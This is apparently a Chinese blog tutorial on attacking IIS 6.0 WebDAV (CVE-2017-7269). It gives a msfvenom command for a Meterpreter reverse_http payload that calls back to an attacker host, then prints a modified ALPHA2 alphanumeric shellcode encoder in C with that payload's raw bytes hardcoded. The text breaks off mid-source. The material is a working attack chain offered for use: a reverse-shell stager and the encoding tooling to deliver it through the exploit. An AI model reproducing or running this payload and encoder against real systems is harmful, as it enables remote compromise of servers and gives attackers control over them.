
针对 IIS 6.0 WebDAV 漏洞 (CVE-2017-7269) 制作纯字母数字 (alphanumeric) 的 shellcode 回连 msf

2017-05-04 11:54 3779 查看
环境:

Kali攻击机1 IP:192.168.114.140

Win7攻击机2 IP(安装gcc和python2.7):192.168.114.130

Windows Server 2003 目标主机 (IIS 6.0，已开启 WebDAV 服务):192.168.114.132

 

在攻击机1中的操作:

使用msfvenom生成shellcode :

msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.114.140 LPORT=5555 -f c

(-f c 输出的是 C 字符串形式的字节数组，后面要原样粘贴进 encode.c 的 evil[] 数组。注意 LHOST/LPORT 会被写死在 shellcode 字节里——下面 evil[] 末尾就能看到 "192.168.114.140" 的 ASCII 字节——所以监听端地址或端口一旦改动，必须重新生成 shellcode 并重新编码。)



在攻击机2中的操作:

新建一个文本文件，把下面的代码拷贝进去，并改成任意名称的 .c 文件 (代码参照: https://bbs.ichunqiu.com/thread-21294-1-1.html 。由于该帖中的 encode.c 编译有误，下面是我修改并翻译后的 encode.c。ALPHA2 本身是 Linux 下的源码，原始地址: http://skypher.com/wiki/index.php/ALPHA2 )。与原版从标准输入读取 shellcode 不同，这个修改版把 shellcode 写死在源码的 evil[] 数组里，换 shellcode 就要改源码重新编译:

// Alpha2.cpp : Defines the entry point for the console application.
//

#include <stdio.h> // printf(), fprintf(), stderr
#include <stdlib.h> // exit(), EXIT_SUCCESS, EXIT_FAILURE, srand(), rand()
#include <string.h> // strcasecmp(), strstr()
#include <time.h> //struct timeval, struct timezone, gettimeofday()
#ifdef _WIN32
#include <winsock.h> // Windows-only header; nothing below uses it, kept for the MinGW build described in the article
#else
#include <strings.h> // strcasecmp(), the POSIX spelling of stricmp()
#endif
#define VERSION_STRING "ALPHA 2: Zero-tolerance. (build 07)"
#define COPYRIGHT      "Copyright (C) 2003, 2004 by Berend-Jan Wever."
/*
________________________________________________________________________________

,sSSs,,s,  ,sSSSs,  ALPHA 2: Zero-tolerance.
SS"  Y$P"  SY"  ,SY
iS'   dY       ,sS"   Unicode-proof uppercase alphanumeric shellcode encoding.
YS,  dSb    ,sY"      Copyright (C) 2003, 2004 by Berend-Jan Wever.
'"YSS'"S' 'SSSSSSSP   <skylined@edup.tudelft.nl>
________________________________________________________________________________

This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
details.

A copy of the GNU General Public License can be found at: http://www.gnu.org/licenses/gpl.html or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston, MA  02111-1307
USA.

Acknowledgements:
Thanks to rix for his phrack article on aphanumeric shellcode.
Thanks to obscou for his phrack article on unicode-proof shellcode.
Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.
*/

#define mixedcase_w32sehgetpc           "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089"
#define uppercase_w32sehgetpc           "VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861816"
#define mixedcase_ascii_decoder_body    "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
#define uppercase_ascii_decoder_body    "VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI"
#define mixedcase_unicode_decoder_body  "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB"
#define uppercase_unicode_decoder_body  "QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB"

/*
 * Decoder stubs. Each entry pairs a BASEADDRESS option name with the
 * alphanumeric code that main() prints in front of the encoded payload: some
 * "baseaddress code" that gets the address of the shellcode into the
 * register(s) the decoder expects (padding plus register moves), followed by
 * the shared *_decoder_body for that mode. The letters are x86 one-byte
 * opcodes, e.g. 'P'..'W' = push eax..edi, 'Y' = pop ecx, 'Q' = push ecx,
 * 'Z' = pop edx, 'I' = dec ecx, 'J' = dec edx, 'L' = dec esp. The
 * "nocompress" tables pad with '7' instead of 'dec' instructions and the
 * unicode tables with '4' (see --nocompress / --unicode in help()).
 * main() selects one of the eight tables by --uppercase/--unicode/
 * --nocompress and matches `id` case-insensitively; every table ends with a
 * { NULL, NULL } sentinel.
 */
struct decoder {
char* id; // id of option: the BASEADDRESS argument ("eax", "[esp+4]", "seh", ...)
char* code; // the decoder: baseaddress code + decoder body, printed verbatim before the payload
} mixedcase_ascii_decoders[] = {
{ "nops",     "IIIIIIIIIIIIIIIIII7" mixedcase_ascii_decoder_body },
{ "eax",      "PYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "ecx",      "IIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "edx",      "JJJJJJJJJJJJJJJJJ7RY" mixedcase_ascii_decoder_body },
{ "ebx",      "SYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "esp",      "TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "ebp",      "UYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "esi",      "VYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "edi",      "WYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLYIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-C]",  "LLLLLLLLLLLLYIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-8]",  "LLLLLLLLYIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-4]",  "LLLL7YIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp]",    "YIIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+4]",  "YYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+8]",  "YYYIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+C]",  "YYYYIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+10]", "YYYYYIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+14]", "YYYYYYIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYYIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYYIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "seh",      mixedcase_w32sehgetpc "IIIIIIIIIIIIIIIII7QZ" // ecx code
mixedcase_ascii_decoder_body },
{ NULL, NULL }
}, uppercase_ascii_decoders[] = {
// --uppercase: same layout, shorter padding, uppercase-only letters.
{ "nops",     "IIIIIIIIIIII" uppercase_ascii_decoder_body },
{ "eax",      "PYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "ecx",      "IIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "edx",      "JJJJJJJJJJJRY" uppercase_ascii_decoder_body },
{ "ebx",      "SYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "esp",      "TYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "ebp",      "UYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "esi",      "VYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "edi",      "WYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLYII7QZ" uppercase_ascii_decoder_body },
{ "[esp-C]",  "LLLLLLLLLLLLYIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp-8]",  "LLLLLLLLYIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp-4]",  "LLLL7YIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp]",    "YIIIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+4]",  "YYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+8]",  "YYYIIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+C]",  "YYYYIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+10]", "YYYYYIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+14]", "YYYYYYIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYYIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYYIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "seh",      uppercase_w32sehgetpc "IIIIIIIIIIIQZ" // ecx code
uppercase_ascii_decoder_body },
{ NULL, NULL }
}, mixedcase_ascii_nocompress_decoders[] = {
// --nocompress: no 'dec' instructions in the baseaddress code, so longer '7' padding.
{ "nops",     "7777777777777777777777777777777777777" mixedcase_ascii_decoder_body },
{ "eax",      "PY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "ecx",      "77777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "edx",      "77777777777777777777777777777777777RY" mixedcase_ascii_decoder_body },
{ "ebx",      "SY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "esp",      "TY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "ebp",      "UY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "esi",      "VY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "edi",      "WY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLY777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-C]",  "LLLLLLLLLLLLY7777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-8]",  "LLLLLLLLY77777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-4]",  "LLLL7Y77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp]",    "Y7777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+4]",  "YY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+8]",  "YYY77777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+C]",  "YYYY7777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+10]", "YYYYY777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+14]", "YYYYYY77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYY7777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYY777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "seh",      mixedcase_w32sehgetpc "77777777777777777777777777777777777QZ" // ecx code
mixedcase_ascii_decoder_body },
{ NULL, NULL }
}, uppercase_ascii_nocompress_decoders[] = {
{ "nops",     "777777777777777777777777" uppercase_ascii_decoder_body },
{ "eax",      "PY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "ecx",      "7777777777777777777777QZ" uppercase_ascii_decoder_body },
{ "edx",      "7777777777777777777777RY" uppercase_ascii_decoder_body },
{ "ebx",      "SY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "esp",      "TY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "ebp",      "UY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "esi",      "VY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "edi",      "WY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLY77777QZ" uppercase_ascii_decoder_body },
{ "[esp-C]",  "LLLLLLLLLLLLY777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-8]",  "LLLLLLLLY7777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-4]",  "LLLL7Y7777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp]",    "Y777777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+4]",  "YY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+8]",  "YYY7777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+C]",  "YYYY777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+10]", "YYYYY77777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+14]", "YYYYYY7777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYY777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYY77777777777777QZ" uppercase_ascii_decoder_body },
{ "seh",      uppercase_w32sehgetpc "7777777777777777777777QZ" // ecx code
uppercase_ascii_decoder_body },
{ NULL, NULL }
}, mixedcase_unicode_decoders[] = {
// --unicode: every byte is followed by a 0x00 on the target, so the stubs are
// written as byte pairs; only a subset of BASEADDRESS options exists here.
{ "nops",     "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
{ "eax",      "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ecx",      "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
{ "edx",      "RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ebx",      "SSYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "esp",      "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ebp",      "UUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "esi",      "VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "edi",      "WWYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "[esp]",    "YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44" mixedcase_unicode_decoder_body },
{ "[esp+4]",  "YUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ NULL, NULL }
}, uppercase_unicode_decoders[] = {
{ "nops",     "IAIAIAIA4444" uppercase_unicode_decoder_body },
{ "eax",      "PPYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ecx",      "IAIAIAIA4444" uppercase_unicode_decoder_body },
{ "edx",      "RRYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ebx",      "SSYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "esp",      "TUYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ebp",      "UUYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "esi",      "VVYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "edi",      "WWYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "[esp]",    "YAIAIAIAIA44" uppercase_unicode_decoder_body },
{ "[esp+4]",  "YUYAIAIAIAIA" uppercase_unicode_decoder_body },
{ NULL, NULL }
}, mixedcase_unicode_nocompress_decoders[] = {
{ "nops",     "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "eax",      "PPYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ecx",      "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "edx",      "RRYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ebx",      "SSYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "esp",      "TUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ebp",      "UUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "esi",      "VVYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "edi",      "WWYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "[esp]",    "YA4444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "[esp+4]",  "YUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ NULL, NULL }
}, uppercase_unicode_nocompress_decoders[] = {
{ "nops",     "44444444444444" uppercase_unicode_decoder_body },
{ "eax",      "PPYA4444444444" uppercase_unicode_decoder_body },
{ "ecx",      "44444444444444" uppercase_unicode_decoder_body },
{ "edx",      "RRYA4444444444" uppercase_unicode_decoder_body },
{ "ebx",      "SSYA4444444444" uppercase_unicode_decoder_body },
{ "esp",      "TUYA4444444444" uppercase_unicode_decoder_body },
{ "ebp",      "UUYA4444444444" uppercase_unicode_decoder_body },
{ "esi",      "VVYA4444444444" uppercase_unicode_decoder_body },
{ "edi",      "WWYA4444444444" uppercase_unicode_decoder_body },
{ "[esp]",    "YA444444444444" uppercase_unicode_decoder_body },
{ "[esp+4]",  "YUYA4444444444" uppercase_unicode_decoder_body },
{ NULL, NULL }
};

/*
 * Decoder tables, indexed by the option bits main() computes as
 * uppercase + unicode*2 + nocompress*4:
 *   bit 0 (1) = --uppercase, bit 1 (2) = --unicode, bit 2 (4) = --nocompress.
 * Every table is terminated by a { NULL, NULL } entry.
 */
struct decoder* decoders[] = {
[0] = mixedcase_ascii_decoders,              // (no options)
[1] = uppercase_ascii_decoders,              // --uppercase
[2] = mixedcase_unicode_decoders,            // --unicode
[3] = uppercase_unicode_decoders,            // --uppercase --unicode
[4] = mixedcase_ascii_nocompress_decoders,   // --nocompress
[5] = uppercase_ascii_nocompress_decoders,   // --uppercase --nocompress
[6] = mixedcase_unicode_nocompress_decoders, // --unicode --nocompress
[7] = uppercase_unicode_nocompress_decoders  // --uppercase --unicode --nocompress
};
// `evil` is the raw shellcode this build encodes: unlike the original ALPHA2,
// which reads the payload from stdin, this port compiles it in, so changing
// the payload means editing this array and rebuilding.
// Paste the output of `msfvenom ... -f c` here (the article's earlier step).
// Because it is a string literal, sizeof(evil) counts a trailing NUL that is
// not part of the payload (main() has to account for that). The listener
// address is baked into these bytes as plain ASCII ("192.168.114.140" near
// the end) together with the stager's HTTP URI, so the array must be
// regenerated whenever LHOST/LPORT change.
char evil[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\x68\x3a\x56"
"\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53\x68\xb3\x15\x00\x00"
"\xe8\x75\x01\x00\x00\x2f\x37\x49\x69\x45\x65\x57\x69\x66\x79"
"\x4f\x59\x71\x7a\x69\x76\x50\x63\x38\x64\x66\x41\x67\x50\x79"
"\x33\x6e\x54\x49\x71\x4b\x42\x44\x46\x37\x2d\x4d\x53\x66\x5a"
"\x71\x57\x4c\x57\x4b\x58\x70\x6d\x4c\x56\x75\x6b\x50\x6e\x34"
"\x5f\x4f\x4f\x69\x31\x4b\x6d\x59\x6c\x5f\x57\x6b\x61\x36\x59"
"\x78\x41\x46\x5a\x76\x6c\x58\x6b\x63\x50\x6f\x53\x53\x57\x71"
"\x5f\x58\x48\x77\x41\x4c\x69\x30\x57\x65\x41\x78\x64\x45\x59"
"\x64\x77\x76\x31\x64\x32\x67\x58\x34\x7a\x50\x56\x39\x63\x71"
"\x37\x6d\x39\x50\x36\x74\x5a\x77\x39\x32\x36\x57\x30\x53\x58"
"\x49\x66\x44\x59\x58\x57\x49\x74\x4d\x4f\x47\x36\x6c\x5a\x51"
"\x65\x38\x44\x69\x7a\x34\x75\x37\x6c\x4d\x4c\x4e\x44\x5a\x6b"
"\x74\x47\x42\x72\x4d\x76\x38\x4f\x64\x58\x64\x46\x32\x50\x70"
"\x7a\x4d\x46\x75\x74\x35\x43\x32\x33\x63\x50\x33\x6a\x46\x62"
"\x4e\x4e\x79\x4b\x38\x72\x31\x79\x4d\x4b\x56\x51\x63\x70\x67"
"\x63\x34\x57\x73\x68\x4f\x57\x65\x4a\x38\x55\x31\x71\x36\x73"
"\x68\x2d\x33\x43\x53\x4d\x6f\x79\x67\x70\x55\x52\x57\x2d\x4c"
"\x56\x68\x73\x70\x4a\x62\x2d\x35\x6a\x4f\x2d\x41\x45\x4d\x00"
"\x50\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53\x68\x00\x02\x60"
"\x84\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e\x3b\xff\xd5\x96"
"\x6a\x0a\x5f\x53\x53\x53\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5"
"\x85\xc0\x75\x14\x68\x88\x13\x00\x00\x68\x44\xf0\x35\xe0\xff"
"\xd5\x4f\x75\xe1\xe8\x4c\x00\x00\x00\x6a\x40\x68\x00\x10\x00"
"\x00\x68\x00\x00\x40\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93"
"\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96"
"\x89\xe2\xff\xd5\x85\xc0\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75"
"\xe5\x58\xc3\x5f\xe8\x7f\xff\xff\xff\x31\x39\x32\x2e\x31\x36"
"\x38\x2e\x31\x31\x34\x2e\x31\x34\x30\x00\xbb\xf0\xb5\xa2\x56"
"\x6a\x00\x53\xff\xd5";

/*
 * Print the ALPHA2 banner (version string, copyright and contact address)
 * to stdout and terminate with EXIT_SUCCESS. Never returns.
 */
void version(void) {
static const char banner[] =
"________________________________________________________________________________\n"
"\n"
"    ,sSSs,,s,  ,sSSSs,  " VERSION_STRING "\n"
"   SS/'  Y$P/' SY/' ,SY \n"
"  iS'   dY       ,sS/'   Unicode-proof uppercase alphanumeric shellcode encoding.\n"
"  YS,  dSb    ,sY/'      " COPYRIGHT "\n"
"  '/'YSS'/'S' 'SSSSSSSP   <skylined@edup.tudelft.nl>\n"
"________________________________________________________________________________\n"
"\n";
// The banner holds no conversion specifiers, so writing it with fputs()
// produces exactly the same bytes as the original printf() call.
fputs(banner, stdout);
exit(EXIT_SUCCESS);
}

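/*
 * Print the usage text to stdout and terminate with EXIT_SUCCESS.
 *
 * name: the program name (argv[0]); it is substituted through the single
 *       %s conversion, never used as a format string, so an attacker-chosen
 *       argv[0] cannot inject conversions.
 *
 * Fixes against the original text: the register list named "ecx" twice
 * where the decoder tables provide "ebx", and the --spaces option accepted
 * by main() was not documented.
 */
void help(char* name)
{
printf(
"\n"
"  使用方法: %s [OPTION] [BASEADDRESS]\n"
"\n"
"  ALPHA 2编码您的IA-32 shellcode仅包含字母数字字符,结果可以是只有大写字母和写字母和(或)unicode的证明,它是您的原始shellcode的编码版本,由一些填充的baseaddress代码组成,解码器程序和编码的原始shellcode,这将适用于任何目标操作系统,所得到的shellcode需要具有RWE访问权限,以修改自己的代码并解码存储器中的原始shellcode.\n"
"\n"
"BASEADDRESS\n"
"  解码器常需要在指定的寄存器中具有基地址.baseaddress代码将baseaddress从给定的寄存器或堆栈位置复制到适当的寄存器中.\n"
"eax, ecx, edx, ebx, esp, ebp, esi, edi\n"
"  从给定的寄存器中取出baseaddress.(使用esp的Unicode baseaddress代码将覆盖由ebp指向的内存的字节!)\n"
"[esp], [esp-X], [esp+X]\n"
"  从堆栈中取出baseaddress\n"
"seh\n"
"  Windows的结构化异常处理程序(seh)可以用于在win32系统上自动计算baseaddress.此选项不适用于unicode-proof shellcode,大写版本不是100 %%可靠.\n"
"nops\n"
"  没有baseaddress代码,只是填充. 如果您需要从源代码中获取baseaddress,请使用此选项(结合--nocompress),并使用自己的代码替换nops. ascii解码器需要在寄存器ecx和edx中的基地址,仅在ecx中的unicode-proof解码器.\n"
"\n"
"-n\n"
"  不输出一个换行后的shellcode.\n"
"--nocompress\n"
"  baseaddress代码使用'dec'指令来降低所需的填充长度. 因此,unicode-proof代码会覆盖shellcode前面的一些字节. 如果不想使用'dec',请使用此选项.\n"
"--unicode\n"
"  把shellcode unicode-proof.这意味着当它被转换为Unicode(在每一个字节中插入一个'0')才被执行.\n"
"--uppercase\n"
"  将shellcode全部转换成大写字符,使用更多的字节然后混合shellcode\n"
"--spaces\n"
"  允许编码结果中出现空格字符(0x20).\n"
"--sources\n"
"  为给定的组合--uppercase和--unicode输出一串基地址(BASEADDRESS)选项\n"
"--help\n"
"  显示帮助和退出\n"
"--version\n"
"  输出版本信息和退出\n"
"\n"
"  请查看源文件获取更多细节和复制条件,该软件不受保护,不用作商业及特定用途\n"
"\n"
"致谢:\n"
"  Thanks to rix for his phrack article on aphanumeric shellcode.\n"
"  Thanks to obscou for his phrack article on unicode-proof shellcode.\n"
"  Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.\n"
"\n"
"  报告bugs:<skylined@edup.tudelft.nl>\n",
name
);
exit(EXIT_SUCCESS);
}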

//-----------------------------------------------------------------------------
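#ifndef _WIN32
// stricmp() is the MSVC/MinGW spelling; POSIX provides strcasecmp() in
// <strings.h>, so map the name when not building on Windows.
#define stricmp strcasecmp
#endif

/*
 * Return a character of `valid_chars` whose low nibble equals `nibble`
 * (0..15).
 *
 * The search starts at a random offset and walks the alphabet cyclically,
 * so identical input bytes do not always encode to the same characters.
 * The original loop advanced with `i = ++i % len`, which modifies `i`
 * twice between sequence points (undefined behaviour in C); this version
 * uses the well-defined `(idx + 1) % len`.
 *
 * Every alphabet main() selects covers all sixteen low-nibble values
 * (digits give 0-9, J..O and Z give 0xA-0xF), so the scan always finds a
 * match; the iteration bound is a safety net so that a future alphabet
 * change cannot turn this into an infinite loop.
 */
static int pick_char(const char *valid_chars, int nibble)
{
size_t len = strlen(valid_chars);
size_t idx = (size_t)rand() % len;
size_t tried;

for (tried = 0; tried < len; tried++)
{
if ((valid_chars[idx] & 0x0f) == nibble)
{
return (unsigned char)valid_chars[idx];
}
idx = (idx + 1) % len;
}
fprintf(stderr, "alpha2: no character with low nibble %d in alphabet\n", nibble);
exit(EXIT_FAILURE);
}

/*
 * Entry point: alpha2 [OPTION]... BASEADDRESS
 *
 * Parses the command line, prints the decoder stub matching the chosen
 * --uppercase/--unicode/--nocompress combination and BASEADDRESS, then
 * encodes the bytes of `evil` (the shellcode compiled into this binary)
 * as pairs of alphanumeric characters and terminates the output with 'A'.
 * --help, --version and --sources print and exit immediately. Exits with
 * EXIT_FAILURE on a missing, duplicated or unknown BASEADDRESS.
 *
 * envp is accepted for compatibility with the original source but unused.
 */
int main(int argc, char* argv[], char* envp[])
{
int   uppercase = 0, unicode = 0, sources = 0,
nonewline = 0, nocompress = 0, options = 0, spaces = 0;
char* baseaddress = NULL;
const char* valid_chars;
int   i;
size_t j;

(void)envp;

// NOTE: the original ALPHA2 seeded rand() from gettimeofday(); that code
// was dropped in this port, so rand() is unseeded and the encoder produces
// the same output for the same input and options on every run.

// Scan all the options and set internal variables accordingly.
// --help and --version print and exit() on their own.
for (i = 1; i < argc; i++)
{
if (strcmp(argv[i], "--help") == 0) help(argv[0]);
else if (strcmp(argv[i], "--version") == 0) version();
else if (strcmp(argv[i], "--uppercase") == 0) uppercase = 1;
else if (strcmp(argv[i], "--unicode") == 0) unicode = 1;
else if (strcmp(argv[i], "--nocompress") == 0) nocompress = 1;
else if (strcmp(argv[i], "--sources") == 0) sources = 1;
else if (strcmp(argv[i], "--spaces") == 0) spaces = 1;
else if (strcmp(argv[i], "-n") == 0) nonewline = 1;
else if (baseaddress == NULL) baseaddress = argv[i];
else
{
fprintf(stderr, "%s: 不止一个BASEADDRESS option: '%s' 和 '%s'\n"
"使用 '%s --help' 获取更多信息.\n",
argv[0], baseaddress, argv[i], argv[0]);
exit(EXIT_FAILURE);
}
}

// A BASEADDRESS is mandatory.
if (baseaddress == NULL)
{
fprintf(stderr, "%s: 缺少 BASEADDRESS 选项.\n"
"使用 '%s --help' 获取更多信息.\n", argv[0], argv[0]);
exit(EXIT_FAILURE);
}

// The three mode flags select one of the eight decoder tables:
// bit 0 = uppercase, bit 1 = unicode, bit 2 = nocompress, in the order
// the `decoders` array is laid out.
options = uppercase + unicode * 2 + nocompress * 4;

// --sources: list the BASEADDRESS ids available in that table and exit.
if (sources)
{
printf("可用的选项 %s%s 包括文字数字的shellcode:\n",
uppercase ? "uppercase" : "mixedcase",
unicode ? " unicode-proof" : "");
for (i = 0; decoders[options][i].id != NULL; i++)
{
printf("  %s\n", decoders[options][i].id);
}
printf("\n");
exit(EXIT_SUCCESS);
}

// Output alphabet. 'A' is deliberately absent: the decoder treats it as the
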